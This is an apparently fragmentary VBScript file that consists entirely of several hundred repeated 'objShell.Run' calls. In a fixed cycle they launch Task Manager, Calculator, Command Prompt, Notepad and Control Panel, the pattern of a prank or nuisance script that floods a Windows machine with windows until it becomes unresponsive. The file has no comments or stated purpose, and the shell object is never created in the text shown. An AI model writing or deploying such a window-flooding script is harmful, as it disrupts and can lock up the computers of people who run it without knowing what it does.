objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
